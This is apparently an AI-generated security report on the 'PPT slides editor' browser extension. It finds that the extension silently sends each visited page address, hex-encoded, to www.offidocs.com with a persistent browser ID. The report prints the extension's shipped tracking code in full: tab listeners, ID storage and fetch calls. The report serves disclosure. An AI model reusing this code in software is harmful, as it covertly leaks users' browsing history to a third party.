Is PPT slides editor safe?
PPT slides editor is high risk. When you open or switch to an HTTP page, PPT slides editor sends the address to www.offidocs.com as a hex-encoded filepath. Testing captured five navigations producing five matching GET requests, all with the same u=fdoi8dosko identifier.…
Who publishes itofficeonlinesystems - 26 other listings from the same operator, 17 of them carrying a finding
officeonlinesystems - 26 other listings from the same operator, 17 of them carrying a finding
What this publisher told the store about itself, and the other listings that told it the same thing.
Same store account
19 other listings published from this account, 1.5M+ users between them. 14 of them carry a finding.
Same operator - 7 listings
Published under a different store account, but sharing the registered address, contact or declared legal entity this one gave the store.
Shared hosts - 1 hostname
Hostnames hardcoded in this extension that few other listings call. That can mean one operator behind both, and it can equally mean a small shared vendor, so it is context rather than a conclusion. Hosts that many listings call are left out: they are services, not connections.
AI-generated. Findings may contain errors. Those marked Verified have been manually reviewed.
Publishers can request a review.
Findings
Visited URLs sent to OffiDocs with a stable browser ID
When you open or switch to an HTTP page, PPT slides editor sends the address to www.offidocs.com as a hex-encoded filepath.
Testing captured five navigations producing five matching GET requests, all with the same u=fdoi8dosko identifier.
You open or switch to a non-OffiDocs HTTP page.
The extension sends that page address to OffiDocs with the same browser-specific ID used on other visits.
| Field | Value | Why it matters | |
|---|---|---|---|
Visited page address | https://example.com/article | This reveals the site and path you visited. Repeated reports create a browsing-history trail. | |
Stable browser ID | fdoi8dosko | This lets separate page visits be tied back to the same browser profile. | |
Encoding flag | 1 | This tells the receiving endpoint that the page address is represented as hex text. | |
Service selector | owncloudservice14 | This adds OffiDocs service context to the browsing report. |
Navigation listener, persistent ID, and OffiDocs request in the shipped code
importScripts(
"./websecure.js"
);var username = "";
let activeTabId, lastUrl;
let servicexx = "";
function getTabInfo(tabId) {
chrome.tabs.get(tabId, function(tab) {
if ( ( tab.url.indexOf("offidocs") == -1 ) && ( tab.url.indexOf("http") !== -1 ) && ( lastUrl != tab.url) ) {
//console.log(" Changed tab.url " + tab.url);
urlx = tab.url;
extractaudio(urlx);
lastUrl = tab.url;
}
});
}
function websecure() {
this.init = function () {
chrome.tabs.onActivated.addListener(function(activeInfo) {
activeTabId = activeInfo.tabId;
getTabInfo(activeTabId);
});
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
//if(activeTabId == tabId) {
getTabInfo(tabId);
//}
});
};
}
if ( chrome.storage.sync.get('username', function (obj) { }) ) {
username = chrome.storage.sync.get('username', function (obj) { });
}
else {
username = "" + randomString(10) + "".toLowerCase();
chrome.storage.sync.set({'username': username.toLowerCase()}, function() { });
}
const stat = new websecure();
stat.init();
function randomString(len, charSet) {
charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
var randomString = '';
for (var i = 0; i < len; i++) {
var randomPoz = Math.floor(Math.random() * charSet.length);
randomString += charSet.substring(randomPoz,randomPoz+1);
}
return randomString.toLowerCase();
}async function extractaudio(urlxx) {
const offidocs_key = "offidocs_key";
var datax = { username: null, offidocscloud: null };
var username = "";
var offidocscloud = "";
let storageResult = await chrome.storage.local.get([offidocs_key]);
if (offidocs_key in storageResult) {
datax = storageResult[offidocs_key]
}
if ( datax.username ) {
username = datax.username;
}
else {
username = "" + randomString(10) + "".toLowerCase();
datax.username = username;
}
if ( datax.offidocscloud ) {
offidocscloud = datax.offidocscloud;
}
else {
offidocscloud = "1";
datax.offidocscloud = "1";
}
var data = {};
data[offidocs_key] = datax;
await chrome.storage.local.set(data);
var un = username;
if ( datax.offidocscloud == "0")
return;
if ( servicexx == "" ) {
let response = await fetch('https://www.offidocs.com/media/system/app/resetlool.php?username=' + username + '&urlpathx=/phpextensions/userext.php');
if (response.status === 200) {
let data = await response.text();
servicexx = data;
}
}
//console.log('https://www.offidocs.com/media/system/app/checkdownloadppteditorx_2_nav.php?filepath=' + bin2hex(urlxx) + '&hex=1&u=' + un + "&s=" + servicexx );
let cfgv = await fetch('https://www.offidocs.com/media/system/app/checkdownloadppteditorx_2_nav.php?filepath=' + bin2hex(urlxx) + '&hex=1&u=' + un + "&s=" + servicexx);
if (cfgv.status === 200) {
let fbv = await cfgv.text();
//console.log(fbv);
var nbv = fbv;
if ( nbv.indexOf("302") !== -1 ) {
var ybv = 'https://www.offidocs.com/media/system/app/view_edit_ppteditor_nav.php?filepath=' + bin2hex(urlxx) + '&u=' + un;
// chrome.tabs.create({ url: ybv });
chrome.tabs.update(chrome.tabs.getCurrent().id, {url: ybv});
}
}
}
function bin2hex (bin)
{
var i = 0, l = bin.length, chr, hex = ''
for (i; i < l; ++i)
{
chr = bin.charCodeAt(i).toString(16)
hex += chr.length < 2 ? '0' + chr : chr
}
return hex
}- www.offidocs.com
Receives the URL-reporting GET request generated by websecure.js on tested page navigations.
Decodes the hex filepath value used by the OffiDocs navigation request so the reported page address can be checked.
#!/usr/bin/env node
const hex = process.argv[2];
if (!hex || !/^[0-9a-fA-F]+$/.test(hex) || hex.length % 2 !== 0) {
console.error('Usage: node decode-offidocs-filepath.js <hex filepath>');
process.exit(1);
}
let decoded = '';
for (let i = 0; i < hex.length; i += 2) {
decoded += String.fromCharCode(parseInt(hex.slice(i, i + 2), 16));
}
console.log(decoded);- 1node decode-offidocs-filepath.js 68747470733a2f2f6578616d706c652e636f6d2f61727469636c65
PPT slides editor tags browsing with a persistent ID
PPT slides editor stores the 10-character ID 'fdoi8dosko' and reuses it in six requests to www.offidocs.com.
Navigation creates offidocs_key.username when missing, saves it locally, and sends it as u/username with the visited URL.
You navigate to or activate a non-OffiDocs web page while the extension is enabled.
The extension stores a browser-specific identifier and sends that same value to OffiDocs with navigation-related requests.
| Field | Value | Why it matters | |
|---|---|---|---|
Stored browser identifier | fdoi8dosko | This value lets later requests from the same browser profile be tied together. | |
Visited page URL | filepath=687474703a2f2f6578616d706c652e636f6d2f (hex for http://example.com/, illustrative) | The page you visit can be included in the navigation request after being converted into hexadecimal text. | |
Cloud setting | offidocscloud=1 | This setting controls whether the extension continues sending the navigation request flow. | |
OffiDocs service value | s=officehost12 (illustrative service value) | A server response is cached and appended to later navigation checks from the same browser profile. |
The extension keeps a stable identifier locally, so later browsing sessions can reuse the same value instead of creating a fresh one.
chrome.storage.local key 'offidocs_key'{
"offidocs_key": {
"username": "fdoi8dosko",
"offidocscloud": "1"
},
"chrome.storage.sync": {
"username": "09anou9dzx"
}
}The shipped code path that creates and reuses the identifier
function getTabInfo(tabId) {
chrome.tabs.get(tabId, function(tab) {
if ( ( tab.url.indexOf("offidocs") == -1 ) && ( tab.url.indexOf("http") !== -1 ) && ( lastUrl != tab.url) ) {
//console.log(" Changed tab.url " + tab.url);
urlx = tab.url;
extractaudio(urlx);
lastUrl = tab.url;
}
});
}
function websecure() {
this.init = function () {
chrome.tabs.onActivated.addListener(function(activeInfo) {
activeTabId = activeInfo.tabId;
getTabInfo(activeTabId);
});
chrome.tabs.onUpdated.addListener(function(tabId, changeInfo, tab) {
//if(activeTabId == tabId) {
getTabInfo(tabId);
//}
});
};
}function randomString(len, charSet) {
charSet = charSet || 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
var randomString = '';
for (var i = 0; i < len; i++) {
var randomPoz = Math.floor(Math.random() * charSet.length);
randomString += charSet.substring(randomPoz,randomPoz+1);
}
return randomString.toLowerCase();
}async function extractaudio(urlxx) {
const offidocs_key = "offidocs_key";
var datax = { username: null, offidocscloud: null };
var username = "";
var offidocscloud = "";
let storageResult = await chrome.storage.local.get([offidocs_key]);
if (offidocs_key in storageResult) {
datax = storageResult[offidocs_key]
}
if ( datax.username ) {
username = datax.username;
}
else {
username = "" + randomString(10) + "".toLowerCase();
datax.username = username;
}
if ( datax.offidocscloud ) {
offidocscloud = datax.offidocscloud;
}
else {
offidocscloud = "1";
datax.offidocscloud = "1";
}
var data = {};
data[offidocs_key] = datax;
await chrome.storage.local.set(data);
var un = username;
if ( datax.offidocscloud == "0")
return;
if ( servicexx == "" ) {
let response = await fetch('https://www.offidocs.com/media/system/app/resetlool.php?username=' + username + '&urlpathx=/phpextensions/userext.php');
if (response.status === 200) {
let data = await response.text();
servicexx = data;
}
}
//console.log('https://www.offidocs.com/media/system/app/checkdownloadppteditorx_2_nav.php?filepath=' + bin2hex(urlxx) + '&hex=1&u=' + un + "&s=" + servicexx );
let cfgv = await fetch('https://www.offidocs.com/media/system/app/checkdownloadppteditorx_2_nav.php?filepath=' + bin2hex(urlxx) + '&hex=1&u=' + un + "&s=" + servicexx);
if (cfgv.status === 200) {
let fbv = await cfgv.text();
//console.log(fbv);
var nbv = fbv;
if ( nbv.indexOf("302") !== -1 ) {
var ybv = 'https://www.offidocs.com/media/system/app/view_edit_ppteditor_nav.php?filepath=' + bin2hex(urlxx) + '&u=' + un;
// chrome.tabs.create({ url: ybv });
chrome.tabs.update(chrome.tabs.getCurrent().id, {url: ybv});
}
}
}function bin2hex (bin)
{
var i = 0, l = bin.length, chr, hex = ''
for (i; i < l; ++i)
{
chr = bin.charCodeAt(i).toString(16)
hex += chr.length < 2 ? '0' + chr : chr
}
return hex
}- www.offidocs.com
Receives the persistent username value in reset and navigation-check requests from the extension.